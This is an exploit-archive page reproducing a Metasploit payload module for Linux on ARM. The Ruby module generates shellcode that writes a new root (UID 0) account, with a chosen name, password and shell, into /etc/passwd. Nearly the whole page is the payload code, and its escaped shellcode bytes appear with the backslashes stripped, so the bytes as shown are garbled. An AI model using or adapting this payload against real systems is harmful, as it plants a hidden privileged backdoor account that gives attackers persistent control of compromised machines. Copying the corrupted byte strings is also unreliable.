Create a New User with UID 0

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Create a New User with UID 0 - ARM (Meta)
# Published : 2010-12-09
# Author :
# Previous Title : Windows XP PRO SP3 - Full ROP calc shellcode
# Next Title : [Raspberry Pi] Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)

# Exploit Title: Linux/ARM - Create a new user with UID 0 (MSF)
# Date: 2010-11-25
# Author: Jonathan Salwan - twitter @jonathansalwan
# Tested on: ARM926EJ-S rev 5 (v5l)
# Issue link: https://metasploit.com/redmine/issues/3254

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

###
#
# AddUser
# -------
#
# Adds a UID 0 user to /etc/passwd.
#
###
module Metasploit3

        include Msf::Payload::Single
        include Msf::Payload::Linux

        def initialize(info = {})
                super(merge_info(info,
                        'Name'          => 'Linux Add User',
                        'Version'       => '???',
                        'Description'   => 'Create a new user with UID 0',
                        'Author'        => [ 'Jonathan Salwan' ],
                        'License'       => MSF_LICENSE,
                        'Platform'      => 'linux',
                        'Arch'          => ARCH_ARMLE,
                        'Privileged'    => true))

                # Register adduser options
                register_options(
                        [
                                OptString.new('USER',  [ true,  "The username to create",     "metasploit" ]),
                                OptString.new('PASS',  [ true,  "The password for this user", "metasploit" ]),
                                OptString.new('SHELL', [ false, "The shell for this user",    "/bin/sh"    ]),
                        ], self.class)
        end

        #
        # Dynamically builds the adduser payload based on the user's options.
        #
        def generate_stage
                user    = datastore['USER']  || 'metasploit'
                pass    = datastore['PASS']  || 'metasploit'
                shell   = datastore['SHELL'] || '/bin/sh'
                str     = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}n"
                strl1   = [ (str.length)+52 ].pack('C*')
                strl2   = [ str.length ].pack('C*')
                pwdir   = "/etc/passwd"
                payload = 
                        "x05x50x45xe0x01x50x8fxe2x15xffx2fxe1" +
                        "x78x46"+ strl1 + "x30xffx21xffx31xffx31" +
                        "xffx31x45x31xdcx22xc8x32x05x27x01xdf" + 
                        "x80x46x41x46x08x1cx79x46x18x31xc0x46" + 
                        strl2 + "x22x04x27x01xdfx41x46x08x1cx06" +
                        "x27x01xdfx1ax49x08x1cx01x27x01xdf" + 
                        str + pwdir

        end

end